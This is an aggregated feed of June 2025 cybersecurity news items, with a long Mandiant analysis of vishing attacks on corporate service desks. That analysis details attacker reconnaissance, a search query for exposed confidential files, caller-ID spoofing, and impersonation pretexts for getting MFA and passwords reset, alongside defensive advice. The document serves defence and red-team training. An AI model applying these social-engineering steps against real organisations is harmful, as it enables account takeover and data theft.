“One of the biggest vulnerabilities in companies is actually humans,” CrowdStrike co-founder and former CTO Dmitri Alperovitch told TechCrunch in this week’s episode of Equity. “The more you automate, the more opportunities there are for people to find vulnerabilities in your system.” With the $50 billion Chinese AI market potentially slipping out of reach for […]

https://techcrunch.com/podcast/crowdstrikes-former-cto-on-cyber-rivalries-and-how-automation-can-undermine-security-for-early-stage-startups/
#Infosec2025 Cloud-Native Technology Prompts New Security Approaches
2025-06-04T16:30:00Z | 1749054600

Moving to cloud-native architecture and modern platforms is allowing enterprises to automate operations and improve security

https://www.infosecurity-magazine.com/news/infosec2025-cloudnative-security/
The future of cybersecurity: Insights from RSAC 2025
2025-06-04T16:00:52Z | 1749052852

My colleague Nakkul Khurana and I attended the RSA Conference 2025 (RSAC 2025) to give a talk on the work we completed at Open Text. How to Use LLMs to Augment Threat Alerts with the MITRE Framework was well received with about 200 people attending. The Open Text booth at the Expo showcased all our Cybersecurity products, was also a main attraction for visitors. The event was also packed with insightful sessions covering the latest trends and challenges in cybersecurity. A major focus this year was the intersection of artificial intelligence (AI) and cybersecurity, exploring both the benefits and the risks. This post summarizes some key takeaways from various talks presented at the conference. AI's dual role in cybersecurity Several sessions highlighted AI's evolving role. George Gerchow's talked about "Harnessing AI to Enhance Cloud Security While Addressing New Attack Vectors." He discussed how AI-powered bots like MongoDB's Guardian Bot (GB) are becoming essential for real-time threat response and automating security and compliance tasks. These bots use AI to adapt to emerging threats and improve operational efficiency, reducing response times significantly. However, AI also brings new risks. Michael Bargury's presentation, "Your Copilot Is My Insider," delved into vulnerabilities associated with AI copilots and plugins. He discussed potential data leakage, RAG poisoning, and new attack vectors that arise from the integration of AI into business processes. The key takeaway was that AI can greatly enhance security. However, it also requires careful management and security measures to prevent misuse. The importance of security in RAG systems Akash Mukherjee and Dr. Saurabh Shintre's "RAG-NAROK: What Poorly-Built RAGs Can Do to Data Security" emphasized the security challenges in Retrieval Augmented Generation (RAG) systems. They explained that adding private data to chatbots requires robust access controls and permissions management to prevent data leakage. Akash and Saurabh also discussed different permission enforcement methods along with the need for sensitive data protection beyond just permissions. Security automation with LLM-driven workflows In the session "Fast-Track Security Automation with LLM-Driven Workflows," Steve Povolny explored the application of Large Language Models (LLMs) in automating security operations. He covered various LLM tools, prompt engineering best practices, and real-world use cases for improving Security Operations Center (SOC) efficiency. Steve also highlighted the importance of addressing security considerations like data privacy, prompt injection risks, and model bias. Principles of GenAI security Diana Kelley's talk, "Principles of GenAI Security: Foundations for Building Security In," provided an overview of Generative AI (GenAI) security. She discussed the GenAI threat landscape, architectural considerations, and security at runtime. Key takeaways include the importance of understanding the unique risks associated with AI systems and implementing security-by-design principles. Adversarial neural patterns in LLMs In "Beyond the Black Box Revealing Adversarial Neural Patterns in LLMs," Mark Cherp and Shaked Reiner focused on uncovering hidden vulnerabilities in LLMs. They discussed new jailbreak techniques and mitigations, exploring the "psychology" of models and how they can be manipulated. This talk highlighted the need for continuous research and development of defences against sophisticated AI attacks. Supply chain security and emerging threats Dr. Andrea Little Limbago's presentation, "A Stuxnet Moment for Supply Chain Security?" addressed the emerging threat of supply chain infiltration, referencing recent incidents like the pager attacks. She discussed how digital supply chain attacks are growing and potentially shifting cyber norms. Her talk also emphasized the need for enhanced security measures and vigilance in hardware and software supply chains. The future of security UX with Agentive AI "How Security UX Must Change, with Agentive AI," explored how user experience (UX) in security must adapt with the rise of agentive AI. In this talk Steph Hay emphasized offloading tasks, dynamic UIs, and exponential outcomes. Assistive UX features like "easy buttons," seeded prompts, and multi-turn chats will become crucial for improving security operations. Social engineering and GenAI Perry Carpenter's session, "Conversations with a GenAI-Powered Virtual Kidnapper (and Other Scambots)," examined how social engineering attacks can leverage generative AI. He demonstrated how these tools create realistic scams and highlighted the need for organizations to prepare and train employees to recognize and respond to these threats. Initial access brokers and market trends "Initial Access Brokers: A Deep Dive," provided insights into the world of initial access brokers (IABs). In this talk, Amit Weigman discussed their methods of operation, the types of access they sell, and current market trends. Understanding the IAB ecosystem is crucial for preventing and responding to security breaches. The evolution of the SOC in an AI-driven universe Dave Gold's presentation, "The Future of the SOC in an AI-Driven Universe," revealed the current state of Security Operations Centers (SOCs) and how they will evolve with AI. He highlighted the shift from manual processes to semi-autonomous and autonomous SOCs, the need for scalable AI-driven platforms, and the evolution of SOC visualizations. Safety and security of LLM agents ”Safety and Security of LLM Agents: Challenges and Future Directions," focused on the unique safety and security challenges posed by LLM agents. Dawn Song discussed potential attacks, evaluation methods, risk assessment, and defences for these systems. Ensuring both safety and security is crucial for realizing the benefits of LLM agents. Zero trust AI and multi-agent systems In "Zero Trust AI: Securing Multi-Agent Systems for Private Data Reasoning," Ken Huang addressed the security of multi-agent systems. He introduced the MAESTRO threat modelling approach and emphasized the need for a zero-trust security model in AI systems handling private data. Conclusion RSAC 2025 makes it clear that AI is fundamentally changing the cybersecurity landscape. While it offers tremendous opportunities for enhancing defences, it also introduces new and complex challenges. Organizations must adapt by understanding these changes, adopting AI-driven security solutions, and addressing the associated risks proactively. Staying informed and prepared is key to navigating the future of cybersecurity. Learn how OpenText Core Threat Detection and Response is leveraging AI-driven behavioural analytics to revolutionize SOC teams. The post The future of cybersecurity: Insights from RSAC 2025 appeared first on OpenText Blogs.

https://blogs.opentext.com/the-future-of-cybersecurity-insights-from-rsac-2025/
When to Call for Backup: How to Know It’s Time for IR Support
2025-06-04T16:00:00Z | 1749052800

Not every incident should be handled alone When a security incident strikes, pressure mounts quickly. Teams feel the urgency to […]

https://www.guidepointsecurity.com/blog/when-to-call-for-backup/
Flashpoint Weekly Vulnerability Insights and Prioritization Report
2025-06-04T15:59:16Z | 1749052756

Anticipate, contextualize, and prioritize vulnerabilities to effectively address threats to your organization. The post Flashpoint Weekly Vulnerability Insights and Prioritization Report appeared first on Flashpoint.

https://flashpoint.io/blog/flashpoint-weekly-vulnerability-insights-prioritization/
Data breach at newspaper giant Lee Enterprises affects 40,000 people
2025-06-04T15:55:04Z | 1749052504

The ransomware attack paralyzed newspaper printing and disrupted operations at media outlets across the country for weeks.

https://techcrunch.com/2025/06/04/data-breach-at-newspaper-giant-lee-enterprises-affects-40000-people/
K000150538: Kubernetes ingress-nginx vulnerabilities CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, and CVE-2025-24514
2025-06-04T15:52:13Z | 1749052333

Security Advisory Description CVE-2025-1097 (also known as IngressNightmare) A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match- ...

https://my.f5.com/manage/s/article/K000150538
Alleged breach of Hacendado via 0-day in third-party vendor – 27M User Records Exposed
2025-06-04T15:39:55Z | 1749051595

Alleged breach of Hacendado via 0-day in third-party vendor – 27M User Records Exposed

https://darkwebinformer.com/alleged-breach-of-hacendado-via-0-day-in-third-party-vendor-27m-user-records-exposed/
Vast array of solar power equipment left exposed online
2025-06-04T15:30:16Z | 1749051016

The most commonly exposed device has been discontinued and vulnerable for a decade, new research found.

https://www.cybersecuritydive.com/news/solar-equipment-exposed-vulnerable-forescout/749806/
Vast array of solar power equipment left exposed online
2025-06-04T15:30:16Z | 1749051016

The most commonly exposed device has been discontinued and vulnerable for a decade, new research found.

https://www.cybersecuritydive.com/news/solar-equipment-exposed-vulnerable-forescout/749806/
#Infosec2025: Cybersecurity Support Networks Too Fragmented for SMBs, Say Experts
2025-06-04T15:30:00Z | 1749051000

Experts argue the case for “communities of support” to boost SMB cyber-resilience

https://www.infosecurity-magazine.com/news/infosec2025-cybersecurity-support/
Google Exposes Vishing Group UNC6040 Targeting Salesforce with Fake Data Loader App
2025-06-04T15:24:00Z | 1749050640

Google has disclosed details of a financially motivated threat cluster that it said "specializes" in voice phishing (aka vishing) campaigns designed to breach organizations' Salesforce instances for large-scale data theft and subsequent extortion. The tech giant's threat intelligence team is tracking the activity under the moniker UNC6040, which it said exhibits characteristics that align with...

https://thehackernews.com/2025/06/google-exposes-vishing-group-unc6040.html
Google warns of cybercriminals targeting Salesforce app to steal data, extort companies
2025-06-04T15:09:34Z | 1749049774

Researchers at Google said the current campaign involving versions of the Salesforce Data Loader tool has targeted about 20 organizations and is ongoing.

https://therecord.media/google-warns-cybercriminals-targeting-salesforce-apps
Nepal Police Allegedly Breached, Sensitive Data Appears for Sale Online
2025-06-04T15:06:21Z | 1749049581

The Nepal Police, the national law enforcement agency of Nepal, has allegedly become the victim of a significant data breach, with a large cache of sensitive information reportedly being offered for sale online. The Nepal Police, established in 1955, is a crucial institution responsible for maintaining law and order, investigating crimes, managing traffic, and leading […]

https://dailydarkweb.net/nepal-police-allegedly-breached-sensitive-data-appears-for-sale-online/
Fake IT support calls hit 20 orgs, end in stolen Salesforce data and extortion, Google warns
2025-06-04T15:05:38Z | 1749049538

Victims include hospitality, retail and education sectors A group of financially motivated cyberscammers who specialize in Scattered-Spider-like fake IT support phone calls managed to trick employees at about 20 organizations into installing a modified version of Salesforce's Data Loader that allows the crims to steal sensitive data.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/fake_it_support_calls_hit/
Attackers Impersonate Ruby Packages to Steal Sensitive Telegram Data
2025-06-04T15:02:57Z | 1749049377

Malicious RubyGems pose as a legitimate plug-in for the popular Fastlane rapid development platform in a geopolitically motivated attack with global supply chain reach.

https://www.darkreading.com/cyberattacks-data-breaches/attackers-impersonate-ruby-packages-telegram-data
Hello, Operator? A Technical Analysis of Vishing Threats
2025-06-04T15:00:00Z | 1749049200

Written by: Nick Guttilla Introduction Organizations are increasingly relying on diverse digital communication channels for essential business operations. The way employees interact with colleagues, access corporate resources, and especially, receive information technology (IT) support is often conducted through calls, chat platforms, and other remote technologies. While these various available methods enhance both efficiency and global accessibility, they also introduce an expanded attack surface that can pose a significant risk if overlooked. Prevalence of in-person social interactions has diminished and remote IT structures, such as an outsourced service desk, has normalized employees' engagement with external or less familiar personnel. As a result, threat actors continue to use social engineering tactics. Vishing in the Wild: A Tale of Two Actors Social engineering is the psychological manipulation of people into performing unsolicited actions or divulging confidential information. It is an effective strategy that preys on human emotions and built-in vulnerabilities like trust and the desire to be helpful. Financially motivated threat actors have increasingly adopted voice-based social engineering, or "vishing," as a primary vector for initial access, though their specific methods and end goals can vary significantly. Two prominent examples illustrate the versatility of this threat. The cluster tracked as UNC3944 (which overlaps with "Scattered Spider") has historically used vishing as a flexible entry point for a range of criminal enterprises. Their operators frequently call corporate service desks, impersonating employees to have credentials and multi-factor authentication (MFA) methods reset. This access is then leveraged for broader attacks, including SIM swapping, ransomware deployment, and data theft extortion. More recently, the financially motivated actor UNC6040 has demonstrated a different vishing playbook. Its operators also impersonate IT support, but with the specific goal of deceiving employees into navigating to Salesforce’s connected app page and authorizing a malicious, actor-controlled version of the Data Loader application. This single action grants the actor the ability to perform large-scale data exfiltration from the victim's Salesforce environment, which is then used for subsequent extortion attempts. While both actors rely on vishing, their distinct objectives—UNC3944’s focus on account takeover for broad network access versus UNC6040’s targeted theft of CRM data—highlight the diverse risks organizations face from this tactic. By reviewing the techniques, tactics, and procedures (TTPs) of actors like UNC3944 and UNC6040, organizations can better assess their own internal policies and guidelines when it comes to employee identification and protection of infrastructure and confidential data. Red teamers can also learn from their methodologies to better emulate real-world attacks and assist organizations in developing defense-in-depth strategies. Mandiant has successfully used the following approaches to perform voice-based social engineering during Red Team Assessments for clients of varying sizes. The described techniques have enabled Mandiant to mimic TTPs from sophisticated vishing actors like UNC3944 and UNC6040, resulting in administrative-level user impersonation, corporate network perimeter breaches, and sensitive data access. Mandiant has additionally convinced multiple service desks to reset credentials and alter several forms of MFA. These simulated incidents have empowered organizations to proactively identify and resolve deficiencies that otherwise may have gone unnoticed and potentially exploited by a real threat actor. aside_block ), ('btn_text', 'Listen now'), ('href', 'https://open.spotify.com/episode/33WgtCDvXBHTiagvmWN8Kj'), ('image', None)])]> Open-Source Intelligence Gathering (OSINT) Effective social engineering campaigns are built upon extensive reconnaissance. The amount of information an attacker can source about corporate culture, employees, policies, procedures, and technologies in use directly impacts the maturity of a phishing scenario's development. A thorough search to provide a comprehensive overview of an organization from an outside perspective would include, but is not limited to, discovery of the following items: Network ranges and IP address space Top-level domains and subdomains Cloud service providers and email infrastructure Internet-accessible and internally used web applications Code repositories Corporate phone numbers and email address formats Employee positions and titles Physical office locations Publicly exposed internal documentation Much of this information can often be found through publicly accessible resources. Company websites and marketing materials often list corporate contact information, including numbers for main lines, specific departments, or even individual employees. Social media platforms provide another means of profiling an organization. Professional networking services can be utilized to scrape the full names of employees and recreate corporate emails matching discovered naming conventions. Resumes shared on these platforms may also contain additional contact information including phone numbers and personal email addresses. Attackers may attempt to elicit private information by sending messages to employees from disposable email accounts, aiming to retrieve details through direct interaction or from out-of-office auto-replies. Additionally, public forums, where employees might seek troubleshooting assistance, can inadvertently reveal company-specific details.  Search engines, such as Google, DuckDuckGo, and Bing, provide advanced filtering capabilities to narrow results from targeted queries based on keywords, file types, and other parameters. Figure 1 includes an example of a search filter designed to uncover sensitive files for a given target that may be unknowingly exposed. “TARGET” filetype:pdf | filetype:doc | filetype:docx | filetype:xls | filetype:xlsx | filetype:ppt | filetype:pptx intext:"confidential" | intext:"internal use only" | intext:"not for public release" | intext:"restricted access" Figure 1: Searching for documents with search filters Anonymity networks, like The Onion Router (TOR), can be used to access hidden services, obtain restricted content, and identify supplemental data such as leaked employee IDs, usernames, passwords, and personally identifiable information (PII).   The internet offers a vast array of resources, and a good amount of intelligence can be discovered without any overt interaction with your target. Leveraging Automated Phone Services Some organizations make use of automated phone systems that have pre-recorded messages and interactive menus. These systems can provide callers with business-related information, facilitate employee self-service, or route calls to appropriate departments. If not found online, an attacker may attempt to obtain the phone number for an automated service by contacting an employee, often at a reception desk, claiming to have misplaced the number. Calling into these automated services allows an attacker to anonymously identify common issues faced by end users, names of internal applications, additional phone numbers for specific support teams, and, occasionally, alerts about company-wide technical issues. This type of information can be used to craft pretexts for subsequent activity that involves impersonating IT support.  Discovering Employee Identification Processes Actors engaged in voice-based social engineering ultimately aim to interact with a human operator. While some automated systems provide a direct option to speak with a live agent, others can require some initial information to be provided, such as an employee ID. However, even in these cases, it is common for repeated incorrect entries to result in the transfer to a live agent anyway. Service desk agents handle a high volume of inbound calls ranging from internal employees needing a password reset to external customers experiencing problems with a public-facing application. They are generally given a scripted process for call handling including information they need to request from the caller for identification as well as where to escalate if they are unable to address the issue directly. During the reconnaissance phase in social engineering a service desk, an attacker may feign ignorance or push boundaries of information disclosure before a requirement for identification is enforced. It is also important for an attacker to take note of how service desk personnel react to incorrect or insufficient information being provided. For example, an attacker may provide an employee ID with an incorrect associated name to observe the response, potentially eliciting the correct full name or determining the validity of the employee ID format. Attackers may also call at different times to converse with varying staff members, use different voice modulations to conceal repeated reconnaissance attempts, and iteratively learn more about the service desk's identification process each time. Alternatively, once a service desk number has been identified, an attacker can better target standard employees directly. Using publicly available resources, attackers can spoof the inbound number of a phone call to match that of the legitimate service desk. Without a procedure for verifying inbound callers claiming to be from IT, unsuspecting targets may be convinced by threat actors to perform actions that grant account access or divulge information that can be used to better impersonate staff. Crafting a Convincing Narrative With sufficient reconnaissance data, an attacker can formulate targeted campaigns reflecting plausible employee scenarios. A common pretext for contacting a service desk is a forgotten password. Many organizations verify employees using multiple factors. While initial reconnaissance might provide an attacker with answers for knowledge-based authentication methods, challenges arise if device-based verification is required. An attacker might impersonate an employee who claims their phone is unavailable (e.g., damaged or lost during travel) and who needs urgent account access. Another common practice is for actors to impersonate employees identified as being on personal time off (PTO) via out-of-office replies, leveraging a sense of urgency to persuade service desk personnel. Responses to such situations can vary, especially for executive-level users. In the event of a successful MFA reset, the attacker can then call back and try to get a different agent on the phone to further reset the impersonated user's password for a full account compromise. If the legitimate employee is genuinely unavailable, unauthorized account access can persist for an extended period of time. The Evolution of an Exploit  The compromise of a single account can serve as a foundation for more complex social engineering campaigns. Breaching the perimeter of an organization often grants an attacker access to internal workflows, chats, documents, meeting invites, and ways to better uncover verified intelligence on existing employees. Open-source tools such as ROADrecon can extract details from entire Entra ID tenants, potentially revealing phone numbers, employee IDs, and organizational hierarchy. Attackers may also seek access to IT ticketing systems and support channels to impersonate service desk staff to end-users who have open requests. The more information an attacker possesses, the more believable their pretext becomes, increasing the probability of success. Strategic Recommendations and Best Practices Modern features in mobile technology, such as AI-powered Scam Detection on Android, demonstrate how software may be able to offer personal protection, but a comprehensive defense for organizations against vishing and related social engineering threats requires broad, proactive security initiatives and a defense-in-depth strategy. Mandiant recommends organizations consider the following best practices to reinforce their external perimeter and develop secure communication channels, particularly those involving IT support and employee verification. Positive Identity Verification for Service Desk Interactions Train service desk personnel to rigorously perform positive identity verification for all employees before modifying accounts or providing security-sensitive information (including during initial enrollment). This is critical for any privileged accounts. Mandated verification methods should include options such as: On-camera/video conference verification where the employee presents a corporate badge or government-issued ID Utilization of an internal, up-to-date employee photo database Challenge/response questions based on information not easily discoverable externally (avoiding reliance on publicly available PII like date of birth or the last four digits of a Social Security number, as actors often possess this data) For high-risk changes, such as MFA resets or password changes for privileged accounts, implement out-of-band verification (e.g., a call-back to a registered phone number or confirmation via a known corporate email address of the employee or their manager). During periods of heightened threat or suspected compromise, consider temporarily disabling self-service password or MFA reset methods and routing all such requests through a manual service desk workflow with enhanced scrutiny. Enforce Strong, Phishing-Resistant MFA MFA should be enforced on all sensitive and internet-facing portals to prevent unauthorized access even in the event of a password compromise.  Standardize one primary MFA solution, for most employees, to simplify security architecture and centralize a platform for detections and alerts. Remove weak forms of MFA, such as SMS, voice calls, or simple email links, as primary authentication factors. These are susceptible to vishing, SIM swapping, and other attacks. Prioritize phishing-resistant MFA methods: FIDO2-compliant security keys (hardware tokens), especially for administrative and privileged users Authenticator applications providing number matching or robust geo-verification features Soft-tokens that are not reliant on easily intercepted channels Ensure administrative users cannot register or use legacy/weak MFA methods, even if those are permitted for other user tiers. Secure MFA Registration and Modification Processes Do not permit employees to self-register new MFA devices without stringent controls. Implement an IT-managed or otherwise secure enrollment process. Restrict MFA registration and modification actions to only be permissible from trusted IP locations and/or compliant corporate devices. Alert on and investigate suspicious MFA registration activities, such as the same MFA method or phone number being registered across multiple user accounts. Manager Involvement and Segregation of Duties Service desks should notify managers (via verified contact channels sourced from internal directories) upon an employee's password reset, especially for sensitive accounts. Require manager approval, through a verified channel, for all MFA resets. This creates third-party awareness and an additional record. For larger organizations, consider segregating service desk responsibilities. Customer-facing support desks should generally not have permissions to modify internal corporate employee accounts. Employee Training and Vishing Awareness Conduct regular phishing simulation exercises that include vishing scenarios to educate employees about the specific risks of voice-based social engineering. Train employees to always verify unexpected calls or requests for sensitive information, especially those claiming to be from IT support or other internal departments, by using an official internal directory to initiate a call-back or by contacting their manager. Train employees to recognize common vishing pretexts (e.g., urgent requests to avoid negative consequences, claims of system issues requiring immediate action, unexpected MFA prompts). Equip service desk employees with access to logs of previous calls and tickets to help identify abnormal patterns, such as repeated calls from unrecognized numbers or sequential MFA reset and password reset requests for the same user. Security Monitoring and Alerting for Vishing-Related Activity Utilize security information and event management (SIEM) and security orchestration, automation, and response (SOAR) technologies to monitor employee sign-in activity and service desk interactions. Create specific alerts for the following: Password reset activity, particularly for privileged accounts or outside of expected patterns New MFA device enrollment or modification of existing MFA methods Multiple failed login attempts followed by a successful password or MFA reset MFA fatigue attacks (multiple sequential incomplete authentications) All activities flagged as abnormal should be reviewed by an internal security team and investigated with the impacted employee and their manager. Further guidance on hardening against UNC3944-style threats, including broader identity, endpoint, and network infrastructure recommendations, is detailed by the Google Threat Intelligence Group (GTIG). Conclusion This discussion of voice-based social engineering and its proposed resolutions aims to provide insight into attack methodologies and preventative measures relevant to this threat vector. Organizations seeking direct support on this subject or other services related to attack simulation and red team exercises are encouraged to contact Mandiant for assistance. Mandiant can discuss specific needs in detail and explore tailored recommendations to better equip security postures against advanced and persistent threats.

https://cloud.google.com/blog/topics/threat-intelligence/technical-analysis-vishing-threats/
North Face, Cartier among latest retail cyber attack victims – here’s what we know so far
2025-06-04T14:45:00Z | 1749048300

Credential stuffing is believed to have been behind at least one of the attacks, but both firms say financial data wasn’t accessed

https://www.itpro.com/security/cyber-attacks/north-face-cartier-among-latest-retail-cyber-attack-victims-heres-what-we-know-so-far
HPE security advisory (AV25-316)
2025-06-04T14:39:20Z | 1749047960

https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av25-316
Alleged data breach of Lyca Mobile France – 2.5 Million Customer Records for Sale
2025-06-04T14:33:50Z | 1749047630

Alleged data breach of Lyca Mobile France – 2.5 Million Customer Records for Sale

https://darkwebinformer.com/alleged-data-breach-of-lyca-mobile-france-2-5-million-customer-records-for-sale/
CISA workforce cut by nearly one-third so far
2025-06-04T14:33:49Z | 1749047629

The agency has lost roughly 1,000 staffers in the wake of the Trump administration’s workforce cuts, losses that could imperil its ability to protect government computer systems and critical infrastructure.

https://www.cybersecuritydive.com/news/cisa-departures-trump-workforce-purge/749796/
CISA workforce cut by nearly one-third so far
2025-06-04T14:33:49Z | 1749047629

The agency has lost roughly 1,000 staffers in the wake of the Trump administration’s workforce cuts, losses that could imperil its ability to protect government computer systems and critical infrastructure.

https://www.cybersecuritydive.com/news/cisa-departures-trump-workforce-purge/749796/
#Infosec2025: Simplicity Should Guide Cybersecurity Purchasing Decisions
2025-06-04T14:30:00Z | 1749047400

Experts argue that CISOs should avoid product duplication and simplify their language to ensure budget is spent wisely

https://www.infosecurity-magazine.com/news/infosec2025-cybersecurity/
Ukraine's military intelligence claims cyberattack on Russian strategic bomber maker
2025-06-04T14:24:12Z | 1749047052

Ukraine said it hacked into the internal systems of Russia’s state-owned aircraft manufacturer Tupolev, days after a drone offensive destroyed planes made by company.

https://therecord.media/ukraine-military-russia-strategic-bomber
OpenText digital fax solutions set course for FedRAMP Authority to Operate & Certification in 2026
2025-06-04T14:20:12Z | 1749046812

FedRAMP certification is increasingly central to how technology providers serve the U.S. government. For cloud-based services that manage sensitive data, achieving FedRAMP authorization is not just a regulatory milestone. It is a signal of trust, security, and capability. This is especially true for secure communication platforms like cloud fax solutions, which continue to play a vital role in government workflows. That is why our very own solutions in OpenText™ Core Fax and OpenText™ Fax Cloud Connect are currently on a clear path to achieving FedRAMP authorization in the first half of 2026. This move reflects a strong commitment to deliver secure, compliant, and reliable services to public sector organizations. But what is FedRAMP and why is it important? FedRAMP, the Federal Risk and Authorization Management Program, is a U.S. government wide initiative that standardizes the security assessment, authorization, and continuous monitoring of cloud services. Any cloud provider seeking to work with a federal agency must either be FedRAMP authorized or actively working toward authorization. All U.S. federal agencies are required to use FedRAMP-authorized cloud services, ensuring a unified and risk-conscious approach to cybersecurity across the federal landscape. For OpenText, achieving FedRAMP authorization goes far beyond simply meeting a compliance requirement. The benefits are significant and strategic: 1. Access to the federal marketFedRAMP authorization is a prerequisite for operating within most U.S. government environments, unlocking opportunities in a highly regulated and expansive sector. 2. Stronger competitive positioningAuthorization signals to both public and private sector clients that OpenText meets the highest standards of security and operational maturity. 3. Operational consistencyBy aligning with a single, rigorous framework recognized across multiple federal agencies, FedRAMP streamlines compliance and reduces complexity. 4. Enhanced cybersecurity postureBuilt on NIST 800-53 controls, FedRAMP includes continuous monitoring, incident response, and vulnerability scanning, strengthening the overall security framework. 5. Data protection by designFedRAMP requires robust encryption (at rest and in transit), role-based access controls, and secure auditing core components of a resilient security architecture. 6. Transparency and oversightAuthorized systems undergo regular reviews and are held to evolving standards, providing agencies with confidence in the integrity and accountability of their cloud services. Alignment with state and local frameworks FedRAMP functions as the foundational framework that supports and often supersedes state level risk and authorization programs, including StateRAMP (a national nonprofit initiative for state and local governments) and state specific programs like TX-RAMP (Texas), AZ-RAMP (Arizona), and others. These programs are modeled after or closely aligned with FedRAMP’s robust standards, leveraging the same core principles such as NIST 800-53 controls, standardized assessment methodologies, and continuous monitoring requirements. As a result, cloud service providers that achieve FedRAMP authorization are well-positioned to meet or exceed the requirements of these state programs. This alignment enables a more efficient path to multi-jurisdictional compliance, reduces duplicative assessment efforts, and reinforces FedRAMP's role as the superset framework underpinning cloud security for all levels of government in the U.S. Finally, the result of the FedRAMP process is an "Authority to Operate" (ATO), which is a formal authorization from the government for a CSP to operate and handle sensitive data. While "certification" is often used in the same context as authorization, it can also refer to the process of meeting FedRAMP requirements and preparing for authorization.  OpenText Fax Cloud Connect and Core Fax: Meeting the standards of secure federal communication OpenText is committed to achieving FedRAMP authorization for its digital cloud fax solutions OpenText Fax Cloud Connect and OpenText Core Fax by the first half of 2026. This is not a theoretical goal; meaningful progress is already well underway. OpenText currently operates a FedRAMP-authorized environment that hosts several approved products, and we are actively working to extend this secure platform to include both Core Fax and Fax Cloud Connect. To support this effort, OpenText has established a sovereign U.S. environment for Core Fax, ensuring that all data remains within U.S. jurisdiction fully aligned with FedRAMP’s stringent data residency and sovereignty requirements. Additionally, we are partnering with a certified Third-Party Assessment Organization (3PAO) to perform an independent assessment of both solutions against the FedRAMP authorization requirements. This ensures a transparent, impartial, and rigorous validation of our security posture. Through this approach, OpenText is not just aiming for compliance. We are delivering secure, trustworthy digital fax solutions that federal agencies can adopt with confidence. Why secure cloud faxing still matters - six real use cases Secure faxing may not dominate headlines in the same way cloud collaboration tools do, but it remains a foundational part of critical workflows where legal, personal, or sensitive data must be transmitted reliably and compliantly. Below are six real-world scenarios where FedRAMP compliant faxing plays an essential role: 1. Health record transfers across agencies A Department of Veterans Affairs clinic needs to send medical documentation to a Department of Defense medical center. These transmissions involve protected health information (PHI) and must comply with HIPAA and federal cybersecurity standards. A FedRAMP-authorized fax solution ensures this information is transmitted securely and reliably. 2. Federal contract submissions Government contractors frequently submit sensitive bid documents, acquisition forms, and defense-related materials via fax. This method remains preferred due to its legal enforceability and chain-of-custody features. FedRAMP compliance ensures that transmitted materials are encrypted, traceable, and stored securely. 3. Military procurement and defense logistics Procurement officers within the Department of Defense often need to fax technical specs, procurement requests, or logistics plans to suppliers and internal teams. These documents may contain controlled unclassified information (CUI). A FedRAMP compliant fax system protects the confidentiality and integrity of that data across all endpoints. 4. Emergency response collaboration During national emergencies, agencies like FEMA rely on fax to rapidly exchange signed waivers, resource deployment plans, and public safety documents. With FedRAMP compliant faxing, sensitive materials can be shared confidently, even in chaotic, time-sensitive environments. 5. Higher education loan and grant processing Federal student aid offices and higher education institutions transmit thousands of loan forms, eligibility records, and grant documentation containing personally identifiable information (PII). Secure faxing remains integral to this process. A FedRAMP authorized platform guarantees compliance with federal privacy regulations. 6. Whistleblower and ethics reporting Agencies that receive confidential or anonymous reports, particularly those related to ethics, legal investigations, or internal audits, often use fax due to its traceability and secure delivery. FedRAMP compliance provides the technical assurance needed to protect these communications. Looking ahead Today, our OpenText Core Fax and OpenText Fax Cloud Connect solutions are built for reliability, compliance, and secure document exchange. With our roadmap firmly set toward FedRAMP authorization in 2026, we are taking the necessary steps to support our public sector clients in their mission to operate securely and efficiently. Our sovereign U.S. environment, third-party assessment strategy, and commitment to continuous monitoring place us in a strong position to support some of the most demanding and security conscious organizations in the country. Secure faxing remains a cornerstone of government communication especially when certainty, privacy, and auditability matter most. With FedRAMP authorization on the horizon, OpenText digital fax solutions are poised to deliver that trust at the highest level. The post OpenText digital fax solutions set course for FedRAMP Authority to Operate & Certification in 2026 appeared first on OpenText Blogs.

https://blogs.opentext.com/opentext-digital-fax-solutions-set-course-for-fedramp-authority-to-operate-certification-in-2026/
Hackers abuse malicious version of Salesforce tool for data theft, extortion
2025-06-04T14:16:39Z | 1749046599

A threat group is using voice phishing to trick targeted organizations into sharing sensitive credentials.

https://www.cybersecuritydive.com/news/hackers-abuse-salesforce-tool-extortion/749790/
Hackers abuse malicious version of Salesforce tool for data theft, extortion
2025-06-04T14:16:39Z | 1749046599

A threat group is using voice phishing to trick targeted organizations into sharing sensitive credentials.

https://www.cybersecuritydive.com/news/hackers-abuse-salesforce-tool-extortion/749790/
Beware of Device Code Phishing
2025-06-04T14:00:00Z | 1749045600

Hackers are exploiting trusted authentication flows — like Microsoft Teams and IoT logins — to trick users into handing over access tokens, bypassing MFA and slipping undetected into corporate networks.

https://www.darkreading.com/vulnerabilities-threats/beware-device-code-phishing
Hackers use Vishing to breach Salesforce customers and swipe data
2025-06-04T14:00:00Z | 1749045600

In an active campaign, a financially motivated threat actor is voice phishing (Vishing) Salesforce customers to compromise their organizational data and carry out subsequent extortion. Tracked as UNC6040 by Google Threat Intelligence Group (GTIG), the threat actor group targets employees within English-speaking branches of multinational corporations to trick them into granting sensitive access or sharing credentials. “Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements,” GITG researchers said in a report shared with CSO ahead of its official release on Wednesday. Specifically, employees are being duped into approving malicious “connected app” – altered versions of Salesforce’s Data Loader, which, once authorized, give attackers direct access to exfiltrate large volumes of sensitive Salesforce data. None of the observed cases in the campaign found threat actors exploiting any Salesforce vulnerability, researchers noted. Abusing Salesforce’s App integration functionality The campaign centers on Salesforce’s Data Loader, a bulk data management tool that lets users import, export, update, delete, or insert large volumes of records within the Salesforce platform. It comes with both a user-friendly interface and a command-line option for advanced customization and automation. The tool supports OAuth and can be directly integrated as a “connected app” within Salesforce. According to GTIG, attackers are exploiting this by convincing victims, often during phone calls, to open the connected apps setup page and enter a connection code, effectively linking a rogue, attacker-controlled version of Data Loader to the victim’s Salesforce environment. The capability of using the modified versions of Data Loader was found consistent with a recent guidance Salesforce had issued on such abuses. On this occasion, GTIG researchers found that the capability and technique differed from one intrusion to another. “In one instance, a threat actor used small chunk sizes for data exfiltration from Salesforce but was only able to retrieve approximately 10% of the data before detection and access revocation,” researchers said. “In another case, numerous test queries were made with small chunk sizes initially. Once sufficient information was gathered, the actor rapidly increased the exfiltration volume to extract entire tables.” Another trick involved naming the modified Data Loader “My Ticket Portal” to match the IT support pretext used 